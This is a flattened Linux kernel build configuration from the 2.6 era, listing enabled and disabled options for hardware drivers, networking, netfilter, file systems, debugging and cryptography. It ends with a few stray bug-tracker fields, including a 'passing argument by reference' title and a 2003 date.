CONFIG_X86_UP_APIC=y CONFIG_X86_UP_IOAPIC=y CONFIG_X86_LOCAL_APIC=y CONFIG_X86_IO_APIC=y CONFIG_X86_TSC=y CONFIG_X86_MCE=y CONFIG_X86_MCE_NONFATAL=y CONFIG_X86_MCE_P4THERMAL=y # CONFIG_TOSHIBA is not set # CONFIG_I8K is not set CONFIG_MICROCODE=y CONFIG_X86_MSR=y CONFIG_X86_CPUID=y CONFIG_EDD=y CONFIG_NOHIGHMEM=y # CONFIG_HIGHMEM4G is not set # CONFIG_HIGHMEM64G is not set # CONFIG_MATH_EMULATION is not set CONFIG_MTRR=y CONFIG_HAVE_DEC_LOCK=y # # Power management options (ACPI, APM) # CONFIG_PM=y # CONFIG_SOFTWARE_SUSPEND is not set # CONFIG_PM_DISK is not set # # ACPI (Advanced Configuration and Power Interface) Support # CONFIG_ACPI=y CONFIG_ACPI_BOOT=y CONFIG_ACPI_INTERPRETER=y CONFIG_ACPI_SLEEP=y CONFIG_ACPI_SLEEP_PROC_FS=y CONFIG_ACPI_AC=y CONFIG_ACPI_BATTERY=y CONFIG_ACPI_BUTTON=y CONFIG_ACPI_FAN=y CONFIG_ACPI_PROCESSOR=y CONFIG_ACPI_THERMAL=y # CONFIG_ACPI_ASUS is not set # CONFIG_ACPI_TOSHIBA is not set # CONFIG_ACPI_DEBUG is not set CONFIG_ACPI_BUS=y CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_PCI=y CONFIG_ACPI_SYSTEM=y # CONFIG_ACPI_RELAXED_AML is not set # # APM (Advanced Power Management) BIOS Support # # CONFIG_APM is not set # # CPU Frequency scaling # # CONFIG_CPU_FREQ is not set # # Bus options (PCI, PCMCIA, EISA, MCA, ISA) # CONFIG_PCI=y # CONFIG_PCI_GOBIOS is not set # CONFIG_PCI_GODIRECT is not set CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y # CONFIG_PCI_LEGACY_PROC is not set CONFIG_PCI_NAMES=y CONFIG_ISA=y # CONFIG_EISA is not set # CONFIG_MCA is not set # CONFIG_SCx200 is not set CONFIG_HOTPLUG=y # # PCMCIA/CardBus support # CONFIG_PCMCIA=y # CONFIG_YENTA is not set # CONFIG_I82092 is not set # CONFIG_I82365 is not set # CONFIG_TCIC is not set CONFIG_PCMCIA_PROBE=y # # PCI Hotplug Support # # CONFIG_HOTPLUG_PCI is not set # # Executable file formats # CONFIG_BINFMT_ELF=y # CONFIG_BINFMT_AOUT is not set # CONFIG_BINFMT_MISC is not set # # Device Drivers # # # Generic Driver Options # CONFIG_FW_LOADER=y # # Memory Technology Devices (MTD) # # CONFIG_MTD is not set # # Parallel port support # CONFIG_PARPORT=y CONFIG_PARPORT_PC=y CONFIG_PARPORT_PC_FIFO=y # CONFIG_PARPORT_PC_SUPERIO is not set # CONFIG_PARPORT_PC_PCMCIA is not set CONFIG_PARPORT_OTHER=y CONFIG_PARPORT_1284=y # # Plug and Play support # CONFIG_PNP=y # CONFIG_PNP_DEBUG is not set # # Protocols # CONFIG_ISAPNP=y CONFIG_PNPBIOS=y # # Block devices # CONFIG_BLK_DEV_FD=y # CONFIG_BLK_DEV_XD is not set # CONFIG_PARIDE is not set # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set # CONFIG_BLK_DEV_UMEM is not set CONFIG_BLK_DEV_LOOP=y # CONFIG_BLK_DEV_CRYPTOLOOP is not set # CONFIG_BLK_DEV_NBD is not set CONFIG_BLK_DEV_RAM=y CONFIG_BLK_DEV_RAM_SIZE=8192 CONFIG_BLK_DEV_INITRD=y # CONFIG_LBD is not set # # ATA/ATAPI/MFM/RLL support # CONFIG_IDE=y CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_HD_IDE is not set CONFIG_BLK_DEV_IDEDISK=y CONFIG_IDEDISK_MULTI_MODE=y # CONFIG_IDEDISK_STROKE is not set # CONFIG_BLK_DEV_IDECS is not set CONFIG_BLK_DEV_IDECD=y # CONFIG_BLK_DEV_IDETAPE is not set # CONFIG_BLK_DEV_IDEFLOPPY is not set # CONFIG_BLK_DEV_IDESCSI is not set # CONFIG_IDE_TASK_IOCTL is not set CONFIG_IDE_TASKFILE_IO=y # # IDE chipset support/bugfixes # # CONFIG_BLK_DEV_CMD640 is not set # CONFIG_BLK_DEV_IDEPNP is not set CONFIG_BLK_DEV_IDEPCI=y CONFIG_IDEPCI_SHARE_IRQ=y # CONFIG_BLK_DEV_OFFBOARD is not set # CONFIG_BLK_DEV_GENERIC is not set # CONFIG_BLK_DEV_OPTI621 is not set # CONFIG_BLK_DEV_RZ1000 is not set CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDEDMA_FORCED is not set CONFIG_IDEDMA_PCI_AUTO=y CONFIG_IDEDMA_ONLYDISK=y # CONFIG_IDEDMA_PCI_WIP is not set CONFIG_BLK_DEV_ADMA=y # CONFIG_BLK_DEV_AEC62XX is not set # CONFIG_BLK_DEV_ALI15X3 is not set # CONFIG_BLK_DEV_AMD74XX is not set # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_TRIFLEX is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5520 is not set # CONFIG_BLK_DEV_CS5530 is not set # CONFIG_BLK_DEV_HPT34X is not set # CONFIG_BLK_DEV_HPT366 is not set # CONFIG_BLK_DEV_SC1200 is not set CONFIG_BLK_DEV_PIIX=y # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SIS5513 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set # CONFIG_BLK_DEV_VIA82CXXX is not set # CONFIG_IDE_CHIPSETS is not set CONFIG_BLK_DEV_IDEDMA=y # CONFIG_IDEDMA_IVB is not set CONFIG_IDEDMA_AUTO=y # CONFIG_DMA_NONPCI is not set # CONFIG_BLK_DEV_HD is not set # # SCSI device support # CONFIG_SCSI=y CONFIG_SCSI_PROC_FS=y # # SCSI support type (disk, tape, CD-ROM) # CONFIG_BLK_DEV_SD=y CONFIG_CHR_DEV_ST=y CONFIG_CHR_DEV_OSST=y CONFIG_BLK_DEV_SR=y CONFIG_BLK_DEV_SR_VENDOR=y CONFIG_CHR_DEV_SG=y # # Some SCSI devices (e.g. CD jukebox) support multiple LUNs # CONFIG_SCSI_MULTI_LUN=y CONFIG_SCSI_REPORT_LUNS=y CONFIG_SCSI_CONSTANTS=y # CONFIG_SCSI_LOGGING is not set # # SCSI low-level drivers # # CONFIG_BLK_DEV_3W_XXXX_RAID is not set # CONFIG_SCSI_7000FASST is not set # CONFIG_SCSI_ACARD is not set # CONFIG_SCSI_AHA152X is not set # CONFIG_SCSI_AHA1542 is not set # CONFIG_SCSI_AACRAID is not set CONFIG_SCSI_AIC7XXX=y CONFIG_AIC7XXX_CMDS_PER_DEVICE=253 CONFIG_AIC7XXX_RESET_DELAY_MS=15000 # CONFIG_AIC7XXX_PROBE_EISA_VL is not set # CONFIG_AIC7XXX_BUILD_FIRMWARE is not set # CONFIG_AIC7XXX_DEBUG_ENABLE is not set CONFIG_AIC7XXX_DEBUG_MASK=0 # CONFIG_AIC7XXX_REG_PRETTY_PRINT is not set # CONFIG_SCSI_AIC7XXX_OLD is not set # CONFIG_SCSI_AIC79XX is not set # CONFIG_SCSI_ADVANSYS is not set # CONFIG_SCSI_IN2000 is not set # CONFIG_SCSI_MEGARAID is not set # CONFIG_SCSI_SATA is not set # CONFIG_SCSI_BUSLOGIC is not set # CONFIG_SCSI_CPQFCTS is not set # CONFIG_SCSI_DMX3191D is not set # CONFIG_SCSI_DTC3280 is not set # CONFIG_SCSI_EATA is not set # CONFIG_SCSI_EATA_PIO is not set # CONFIG_SCSI_FUTURE_DOMAIN is not set CONFIG_SCSI_GDTH=y # CONFIG_SCSI_GENERIC_NCR5380 is not set # CONFIG_SCSI_GENERIC_NCR5380_MMIO is not set # CONFIG_SCSI_IPS is not set # CONFIG_SCSI_INIA100 is not set # CONFIG_SCSI_PPA is not set # CONFIG_SCSI_IMM is not set # CONFIG_SCSI_NCR53C406A is not set # CONFIG_SCSI_SYM53C8XX_2 is not set # CONFIG_SCSI_PAS16 is not set # CONFIG_SCSI_PSI240I is not set # CONFIG_SCSI_QLOGIC_FAS is not set # CONFIG_SCSI_QLOGIC_ISP is not set # CONFIG_SCSI_QLOGIC_FC is not set # CONFIG_SCSI_QLOGIC_1280 is not set # CONFIG_SCSI_SYM53C416 is not set # CONFIG_SCSI_DC395x is not set # CONFIG_SCSI_T128 is not set # CONFIG_SCSI_U14_34F is not set # CONFIG_SCSI_ULTRASTOR is not set # CONFIG_SCSI_NSP32 is not set # CONFIG_SCSI_DEBUG is not set # # Old CD-ROM drivers (not SCSI, not IDE) # # CONFIG_CD_NO_IDESCSI is not set # # Multi-device support (RAID and LVM) # CONFIG_MD=y CONFIG_BLK_DEV_MD=y CONFIG_MD_LINEAR=y CONFIG_MD_RAID0=y CONFIG_MD_RAID1=y # CONFIG_MD_RAID5 is not set CONFIG_MD_MULTIPATH=y CONFIG_BLK_DEV_DM=y CONFIG_DM_IOCTL_V4=y # # Fusion MPT device support # # CONFIG_FUSION is not set # # IEEE 1394 (FireWire) support (EXPERIMENTAL) # # CONFIG_IEEE1394 is not set # # I2O device support # # CONFIG_I2O is not set # # Networking support # CONFIG_NET=y # # Networking options # CONFIG_PACKET=y CONFIG_PACKET_MMAP=y CONFIG_NETLINK_DEV=y CONFIG_UNIX=y # CONFIG_NET_KEY is not set CONFIG_INET=y CONFIG_IP_MULTICAST=y # CONFIG_IP_ADVANCED_ROUTER is not set # CONFIG_IP_PNP is not set CONFIG_NET_IPIP=y CONFIG_NET_IPGRE=y # CONFIG_NET_IPGRE_BROADCAST is not set # CONFIG_IP_MROUTE is not set # CONFIG_ARPD is not set CONFIG_INET_ECN=y # CONFIG_SYN_COOKIES is not set CONFIG_INET_AH=y CONFIG_INET_ESP=y CONFIG_INET_IPCOMP=y # # IP: Virtual Server Configuration # # CONFIG_IP_VS is not set # CONFIG_IPV6 is not set # CONFIG_DECNET is not set # CONFIG_BRIDGE is not set CONFIG_NETFILTER=y CONFIG_NETFILTER_DEBUG=y # # IP: Netfilter Configuration # CONFIG_IP_NF_CONNTRACK=y CONFIG_IP_NF_FTP=y CONFIG_IP_NF_IRC=y CONFIG_IP_NF_TFTP=y CONFIG_IP_NF_AMANDA=y CONFIG_IP_NF_QUEUE=y CONFIG_IP_NF_IPTABLES=y CONFIG_IP_NF_MATCH_LIMIT=y CONFIG_IP_NF_MATCH_IPRANGE=y CONFIG_IP_NF_MATCH_MAC=y CONFIG_IP_NF_MATCH_PKTTYPE=y CONFIG_IP_NF_MATCH_MARK=y CONFIG_IP_NF_MATCH_MULTIPORT=y CONFIG_IP_NF_MATCH_TOS=y CONFIG_IP_NF_MATCH_RECENT=y CONFIG_IP_NF_MATCH_ECN=y CONFIG_IP_NF_MATCH_DSCP=y CONFIG_IP_NF_MATCH_AH_ESP=y CONFIG_IP_NF_MATCH_LENGTH=y CONFIG_IP_NF_MATCH_TTL=y CONFIG_IP_NF_MATCH_TCPMSS=y CONFIG_IP_NF_MATCH_HELPER=y CONFIG_IP_NF_MATCH_STATE=y CONFIG_IP_NF_MATCH_CONNTRACK=y CONFIG_IP_NF_MATCH_OWNER=y CONFIG_IP_NF_FILTER=y CONFIG_IP_NF_TARGET_REJECT=y CONFIG_IP_NF_NAT=y CONFIG_IP_NF_NAT_NEEDED=y CONFIG_IP_NF_TARGET_MASQUERADE=y CONFIG_IP_NF_TARGET_REDIRECT=y CONFIG_IP_NF_TARGET_NETMAP=y CONFIG_IP_NF_TARGET_SAME=y CONFIG_IP_NF_NAT_LOCAL=y CONFIG_IP_NF_NAT_SNMP_BASIC=y CONFIG_IP_NF_NAT_IRC=y CONFIG_IP_NF_NAT_FTP=y CONFIG_IP_NF_NAT_TFTP=y CONFIG_IP_NF_NAT_AMANDA=y CONFIG_IP_NF_MANGLE=y CONFIG_IP_NF_TARGET_TOS=y CONFIG_IP_NF_TARGET_ECN=y CONFIG_IP_NF_TARGET_DSCP=y CONFIG_IP_NF_TARGET_MARK=y CONFIG_IP_NF_TARGET_CLASSIFY=y CONFIG_IP_NF_TARGET_LOG=y CONFIG_IP_NF_TARGET_ULOG=y CONFIG_IP_NF_TARGET_TCPMSS=y # CONFIG_IP_NF_ARPTABLES is not set CONFIG_XFRM=y CONFIG_XFRM_USER=y # # SCTP Configuration (EXPERIMENTAL) # CONFIG_IPV6_SCTP__=y # CONFIG_IP_SCTP is not set # CONFIG_ATM is not set # CONFIG_VLAN_8021Q is not set # CONFIG_LLC2 is not set # CONFIG_IPX is not set # CONFIG_ATALK is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_NET_DIVERT is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set # CONFIG_NET_FASTROUTE is not set # CONFIG_NET_HW_FLOWCONTROL is not set # # QoS and/or fair queueing # CONFIG_NET_SCHED=y CONFIG_NET_SCH_CBQ=y CONFIG_NET_SCH_HTB=y CONFIG_NET_SCH_CSZ=y CONFIG_NET_SCH_PRIO=y CONFIG_NET_SCH_RED=y CONFIG_NET_SCH_SFQ=y CONFIG_NET_SCH_TEQL=y CONFIG_NET_SCH_TBF=y CONFIG_NET_SCH_GRED=y CONFIG_NET_SCH_DSMARK=y CONFIG_NET_SCH_INGRESS=y CONFIG_NET_QOS=y CONFIG_NET_ESTIMATOR=y CONFIG_NET_CLS=y CONFIG_NET_CLS_TCINDEX=y CONFIG_NET_CLS_ROUTE4=y CONFIG_NET_CLS_ROUTE=y CONFIG_NET_CLS_FW=y CONFIG_NET_CLS_U32=y CONFIG_NET_CLS_RSVP=y CONFIG_NET_CLS_RSVP6=y CONFIG_NET_CLS_POLICE=y # # Network testing # # CONFIG_NET_PKTGEN is not set CONFIG_NETDEVICES=y # # ARCnet devices # # CONFIG_ARCNET is not set CONFIG_DUMMY=y # CONFIG_BONDING is not set # CONFIG_EQUALIZER is not set # CONFIG_TUN is not set # CONFIG_ETHERTAP is not set # CONFIG_NET_SB1000 is not set # # Ethernet (10 or 100Mbit) # CONFIG_NET_ETHERNET=y CONFIG_MII=y # CONFIG_HAPPYMEAL is not set # CONFIG_SUNGEM is not set CONFIG_NET_VENDOR_3COM=y # CONFIG_EL1 is not set # CONFIG_EL2 is not set # CONFIG_ELPLUS is not set # CONFIG_EL16 is not set # CONFIG_EL3 is not set # CONFIG_3C515 is not set CONFIG_VORTEX=y # CONFIG_TYPHOON is not set # CONFIG_LANCE is not set # CONFIG_NET_VENDOR_SMC is not set # CONFIG_NET_VENDOR_RACAL is not set # # Tulip family network device support # # CONFIG_NET_TULIP is not set # CONFIG_AT1700 is not set # CONFIG_DEPCA is not set # CONFIG_HP100 is not set # CONFIG_NET_ISA is not set CONFIG_NET_PCI=y # CONFIG_PCNET32 is not set # CONFIG_AMD8111_ETH is not set # CONFIG_ADAPTEC_STARFIRE is not set # CONFIG_AC3200 is not set # CONFIG_APRICOT is not set # CONFIG_B44 is not set # CONFIG_CS89x0 is not set # CONFIG_DGRS is not set # CONFIG_EEPRO100 is not set # CONFIG_E100 is not set # CONFIG_FEALNX is not set # CONFIG_NATSEMI is not set # CONFIG_NE2K_PCI is not set # CONFIG_8139CP is not set # CONFIG_8139TOO is not set # CONFIG_SIS900 is not set # CONFIG_EPIC100 is not set # CONFIG_SUNDANCE is not set # CONFIG_TLAN is not set # CONFIG_VIA_RHINE is not set # CONFIG_NET_POCKET is not set # # Ethernet (1000 Mbit) # # CONFIG_ACENIC is not set # CONFIG_DL2K is not set # CONFIG_E1000 is not set # CONFIG_NS83820 is not set # CONFIG_HAMACHI is not set # CONFIG_YELLOWFIN is not set # CONFIG_R8169 is not set # CONFIG_SIS190 is not set # CONFIG_SK98LIN is not set # CONFIG_TIGON3 is not set # # Ethernet (10000 Mbit) # # CONFIG_IXGB is not set # CONFIG_FDDI is not set # CONFIG_HIPPI is not set # CONFIG_PLIP is not set # CONFIG_PPP is not set # CONFIG_SLIP is not set # # Wireless LAN (non-hamradio) # # CONFIG_NET_RADIO is not set # # Token Ring devices # # CONFIG_TR is not set # CONFIG_NET_FC is not set # CONFIG_RCPCI is not set # CONFIG_SHAPER is not set # # Wan interfaces # # CONFIG_WAN is not set # # PCMCIA network device support # CONFIG_NET_PCMCIA=y # CONFIG_PCMCIA_3C589 is not set # CONFIG_PCMCIA_3C574 is not set # CONFIG_PCMCIA_FMVJ18X is not set CONFIG_PCMCIA_PCNET=y # CONFIG_PCMCIA_NMCLAN is not set # CONFIG_PCMCIA_SMC91C92 is not set # CONFIG_PCMCIA_XIRC2PS is not set # CONFIG_PCMCIA_AXNET is not set # # Amateur Radio support # # CONFIG_HAMRADIO is not set # # IrDA (infrared) support # # CONFIG_IRDA is not set # # Bluetooth support # # CONFIG_BT is not set # # ISDN subsystem # # CONFIG_ISDN_BOOL is not set # # Telephony Support # # CONFIG_PHONE is not set # # Input device support # CONFIG_INPUT=y # # Userland interfaces # CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=768 # CONFIG_INPUT_JOYDEV is not set # CONFIG_INPUT_TSDEV is not set # CONFIG_INPUT_EVDEV is not set # CONFIG_INPUT_EVBUG is not set # # Input I/O drivers # # CONFIG_GAMEPORT is not set CONFIG_SOUND_GAMEPORT=y CONFIG_SERIO=y CONFIG_SERIO_I8042=y CONFIG_SERIO_SERPORT=y # CONFIG_SERIO_CT82C710 is not set # CONFIG_SERIO_PARKBD is not set # CONFIG_SERIO_PCIPS2 is not set # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y # CONFIG_KEYBOARD_SUNKBD is not set # CONFIG_KEYBOARD_XTKBD is not set # CONFIG_KEYBOARD_NEWTON is not set CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=y # CONFIG_MOUSE_PS2_SYNAPTICS is not set # CONFIG_MOUSE_SERIAL is not set # CONFIG_MOUSE_INPORT is not set # CONFIG_MOUSE_LOGIBM is not set # CONFIG_MOUSE_PC110PAD is not set # CONFIG_INPUT_JOYSTICK is not set # CONFIG_INPUT_TOUCHSCREEN is not set # CONFIG_INPUT_MISC is not set # # Character devices # CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y # CONFIG_SERIAL_NONSTANDARD is not set # # Serial drivers # # CONFIG_SERIAL_8250 is not set # # Non-8250 serial port support # CONFIG_UNIX98_PTYS=y CONFIG_UNIX98_PTY_COUNT=256 CONFIG_PRINTER=y # CONFIG_LP_CONSOLE is not set # CONFIG_PPDEV is not set # CONFIG_TIPAR is not set # # I2C support # # CONFIG_I2C is not set # # I2C Algorithms # # # I2C Hardware Bus support # # # I2C Hardware Sensors Chip support # # CONFIG_I2C_SENSOR is not set # # Mice # # CONFIG_BUSMOUSE is not set # CONFIG_QIC02_TAPE is not set # # IPMI # # CONFIG_IPMI_HANDLER is not set # # Watchdog Cards # CONFIG_WATCHDOG=y CONFIG_WATCHDOG_NOWAYOUT=y CONFIG_SOFT_WATCHDOG=y # CONFIG_WDT is not set # CONFIG_WDTPCI is not set # CONFIG_PCWATCHDOG is not set # CONFIG_ACQUIRE_WDT is not set # CONFIG_ADVANTECH_WDT is not set # CONFIG_EUROTECH_WDT is not set # CONFIG_IB700_WDT is not set # CONFIG_I810_TCO is not set # CONFIG_MIXCOMWD is not set # CONFIG_SCx200_WDT is not set # CONFIG_60XX_WDT is not set # CONFIG_W83877F_WDT is not set # CONFIG_MACHZ_WDT is not set # CONFIG_SC520_WDT is not set # CONFIG_AMD7XX_TCO is not set # CONFIG_ALIM7101_WDT is not set # CONFIG_ALIM1535_WDT is not set # CONFIG_SC1200_WDT is not set # CONFIG_WAFER_WDT is not set # CONFIG_CPU5_WDT is not set CONFIG_HW_RANDOM=y CONFIG_NVRAM=y CONFIG_RTC=y # CONFIG_DTLK is not set # CONFIG_R3964 is not set # CONFIG_APPLICOM is not set # CONFIG_SONYPI is not set # # Ftape, the floppy tape device driver # # CONFIG_FTAPE is not set CONFIG_AGP=y # CONFIG_AGP_ALI is not set # CONFIG_AGP_ATI is not set # CONFIG_AGP_AMD is not set # CONFIG_AGP_AMD64 is not set CONFIG_AGP_INTEL=y # CONFIG_AGP_NVIDIA is not set # CONFIG_AGP_SIS is not set # CONFIG_AGP_SWORKS is not set # CONFIG_AGP_VIA is not set # CONFIG_DRM is not set # # PCMCIA character devices # # CONFIG_SYNCLINK_CS is not set # CONFIG_MWAVE is not set # CONFIG_RAW_DRIVER is not set # CONFIG_HANGCHECK_TIMER is not set # # Multimedia devices # # CONFIG_VIDEO_DEV is not set # # Digital Video Broadcasting Devices # # CONFIG_DVB is not set # # Graphics support # # CONFIG_FB is not set # CONFIG_VIDEO_SELECT is not set # # Console display driver support # CONFIG_VGA_CONSOLE=y # CONFIG_MDA_CONSOLE is not set CONFIG_DUMMY_CONSOLE=y # # Sound # # CONFIG_SOUND is not set # # USB support # CONFIG_USB=y # CONFIG_USB_DEBUG is not set # # Miscellaneous USB options # CONFIG_USB_DEVICEFS=y # CONFIG_USB_BANDWIDTH is not set # CONFIG_USB_DYNAMIC_MINORS is not set # # USB Host Controller Drivers # CONFIG_USB_EHCI_HCD=y # CONFIG_USB_OHCI_HCD is not set CONFIG_USB_UHCI_HCD=y # # USB Device Class drivers # # CONFIG_USB_BLUETOOTH_TTY is not set CONFIG_USB_ACM=y CONFIG_USB_PRINTER=y CONFIG_USB_STORAGE=y # CONFIG_USB_STORAGE_DEBUG is not set # CONFIG_USB_STORAGE_DATAFAB is not set # CONFIG_USB_STORAGE_FREECOM is not set # CONFIG_USB_STORAGE_ISD200 is not set # CONFIG_USB_STORAGE_DPCM is not set # CONFIG_USB_STORAGE_HP8200e is not set # CONFIG_USB_STORAGE_SDDR09 is not set # CONFIG_USB_STORAGE_SDDR55 is not set # CONFIG_USB_STORAGE_JUMPSHOT is not set # # USB Human Interface Devices (HID) # # CONFIG_USB_HID is not set # # USB HID Boot Protocol drivers # # CONFIG_USB_KBD is not set # CONFIG_USB_MOUSE is not set # CONFIG_USB_AIPTEK is not set # CONFIG_USB_WACOM is not set # CONFIG_USB_KBTAB is not set # CONFIG_USB_POWERMATE is not set # CONFIG_USB_XPAD is not set # # USB Imaging devices # # CONFIG_USB_MDC800 is not set # CONFIG_USB_SCANNER is not set # CONFIG_USB_MICROTEK is not set # CONFIG_USB_HPUSBSCSI is not set # # USB Multimedia devices # # CONFIG_USB_DABUSB is not set # # Video4Linux support is needed for USB Multimedia device support # # # USB Network adaptors # # CONFIG_USB_CATC is not set # CONFIG_USB_KAWETH is not set # CONFIG_USB_PEGASUS is not set # CONFIG_USB_RTL8150 is not set # CONFIG_USB_USBNET is not set # # USB port drivers # # CONFIG_USB_USS720 is not set # # USB Serial Converter support # # CONFIG_USB_SERIAL is not set # # USB Miscellaneous drivers # # CONFIG_USB_TIGL is not set # CONFIG_USB_AUERSWALD is not set # CONFIG_USB_RIO500 is not set # CONFIG_USB_BRLVGER is not set # CONFIG_USB_LCD is not set # CONFIG_USB_TEST is not set # CONFIG_USB_GADGET is not set # # File systems # CONFIG_EXT2_FS=y # CONFIG_EXT2_FS_XATTR is not set CONFIG_EXT3_FS=y CONFIG_EXT3_FS_XATTR=y # CONFIG_EXT3_FS_POSIX_ACL is not set # CONFIG_EXT3_FS_SECURITY is not set CONFIG_JBD=y # CONFIG_JBD_DEBUG is not set CONFIG_FS_MBCACHE=y CONFIG_REISERFS_FS=y # CONFIG_REISERFS_CHECK is not set # CONFIG_REISERFS_PROC_INFO is not set # CONFIG_JFS_FS is not set # CONFIG_XFS_FS is not set CONFIG_MINIX_FS=y # CONFIG_ROMFS_FS is not set # CONFIG_QUOTA is not set # CONFIG_AUTOFS_FS is not set # CONFIG_AUTOFS4_FS is not set # # CD-ROM/DVD Filesystems # CONFIG_ISO9660_FS=y CONFIG_JOLIET=y CONFIG_ZISOFS=y CONFIG_ZISOFS_FS=y # CONFIG_UDF_FS is not set # # DOS/FAT/NT Filesystems # CONFIG_FAT_FS=y CONFIG_MSDOS_FS=y CONFIG_VFAT_FS=y # CONFIG_NTFS_FS is not set # # Pseudo filesystems # CONFIG_PROC_FS=y CONFIG_PROC_KCORE=y # CONFIG_DEVFS_FS is not set CONFIG_DEVPTS_FS=y # CONFIG_DEVPTS_FS_XATTR is not set CONFIG_TMPFS=y # CONFIG_HUGETLBFS is not set # CONFIG_HUGETLB_PAGE is not set CONFIG_RAMFS=y # # Miscellaneous filesystems # # CONFIG_ADFS_FS is not set # CONFIG_AFFS_FS is not set # CONFIG_HFS_FS is not set # CONFIG_BEFS_FS is not set # CONFIG_BFS_FS is not set # CONFIG_EFS_FS is not set # CONFIG_CRAMFS is not set # CONFIG_VXFS_FS is not set # CONFIG_HPFS_FS is not set # CONFIG_QNX4FS_FS is not set # CONFIG_SYSV_FS is not set # CONFIG_UFS_FS is not set # # Network File Systems # # CONFIG_NFS_FS is not set # CONFIG_NFSD is not set # CONFIG_EXPORTFS is not set # CONFIG_SMB_FS is not set # CONFIG_CIFS is not set # CONFIG_NCP_FS is not set # CONFIG_CODA_FS is not set # CONFIG_INTERMEZZO_FS is not set # CONFIG_AFS_FS is not set # # Partition Types # # CONFIG_PARTITION_ADVANCED is not set CONFIG_MSDOS_PARTITION=y CONFIG_NLS=y # # Native Language Support # CONFIG_NLS_DEFAULT="iso8859-1" CONFIG_NLS_CODEPAGE_437=y # CONFIG_NLS_CODEPAGE_737 is not set # CONFIG_NLS_CODEPAGE_775 is not set CONFIG_NLS_CODEPAGE_850=y # CONFIG_NLS_CODEPAGE_852 is not set # CONFIG_NLS_CODEPAGE_855 is not set # CONFIG_NLS_CODEPAGE_857 is not set # CONFIG_NLS_CODEPAGE_860 is not set # CONFIG_NLS_CODEPAGE_861 is not set # CONFIG_NLS_CODEPAGE_862 is not set # CONFIG_NLS_CODEPAGE_863 is not set # CONFIG_NLS_CODEPAGE_864 is not set # CONFIG_NLS_CODEPAGE_865 is not set # CONFIG_NLS_CODEPAGE_866 is not set # CONFIG_NLS_CODEPAGE_869 is not set # CONFIG_NLS_CODEPAGE_936 is not set # CONFIG_NLS_CODEPAGE_950 is not set # CONFIG_NLS_CODEPAGE_932 is not set # CONFIG_NLS_CODEPAGE_949 is not set # CONFIG_NLS_CODEPAGE_874 is not set # CONFIG_NLS_ISO8859_8 is not set CONFIG_NLS_CODEPAGE_1250=y CONFIG_NLS_CODEPAGE_1251=y CONFIG_NLS_ISO8859_1=y # CONFIG_NLS_ISO8859_2 is not set # CONFIG_NLS_ISO8859_3 is not set # CONFIG_NLS_ISO8859_4 is not set # CONFIG_NLS_ISO8859_5 is not set # CONFIG_NLS_ISO8859_6 is not set # CONFIG_NLS_ISO8859_7 is not set # CONFIG_NLS_ISO8859_9 is not set # CONFIG_NLS_ISO8859_13 is not set # CONFIG_NLS_ISO8859_14 is not set CONFIG_NLS_ISO8859_15=y # CONFIG_NLS_KOI8_R is not set # CONFIG_NLS_KOI8_U is not set CONFIG_NLS_UTF8=y # # Profiling support # # CONFIG_PROFILING is not set # # Kernel hacking # CONFIG_DEBUG_KERNEL=y CONFIG_DEBUG_STACKOVERFLOW=y CONFIG_DEBUG_SLAB=y # CONFIG_DEBUG_IOVIRT is not set CONFIG_MAGIC_SYSRQ=y CONFIG_DEBUG_SPINLOCK=y # CONFIG_DEBUG_PAGEALLOC is not set # CONFIG_DEBUG_INFO is not set CONFIG_DEBUG_SPINLOCK_SLEEP=y CONFIG_FRAME_POINTER=y CONFIG_X86_EXTRA_IRQS=y CONFIG_X86_FIND_SMP_CONFIG=y CONFIG_X86_MPPARSE=y # # Security options # # CONFIG_SECURITY is not set # # Cryptographic options # CONFIG_CRYPTO=y CONFIG_CRYPTO_HMAC=y # CONFIG_CRYPTO_NULL is not set # CONFIG_CRYPTO_MD4 is not set CONFIG_CRYPTO_MD5=y CONFIG_CRYPTO_SHA1=y # CONFIG_CRYPTO_SHA256 is not set # CONFIG_CRYPTO_SHA512 is not set CONFIG_CRYPTO_DES=y # CONFIG_CRYPTO_BLOWFISH is not set # CONFIG_CRYPTO_TWOFISH is not set # CONFIG_CRYPTO_SERPENT is not set # CONFIG_CRYPTO_AES is not set # CONFIG_CRYPTO_CAST5 is not set # CONFIG_CRYPTO_CAST6 is not set CONFIG_CRYPTO_DEFLATE=y # CONFIG_CRYPTO_TEST is not set # # Library routines # CONFIG_CRC32=y CONFIG_ZLIB_INFLATE=y CONFIG_ZLIB_DEFLATE=y CONFIG_X86_BIOS_REBOOT=y CONFIG_PC=y</t>
  </si>
  <si>
    <t>passing argument by reference</t>
  </si>
  <si>
    <t>2003-12-30 22:48 UTC</t>
  </si>
  <si>
    <t>1759 1776</t>
  </si>
  <si>
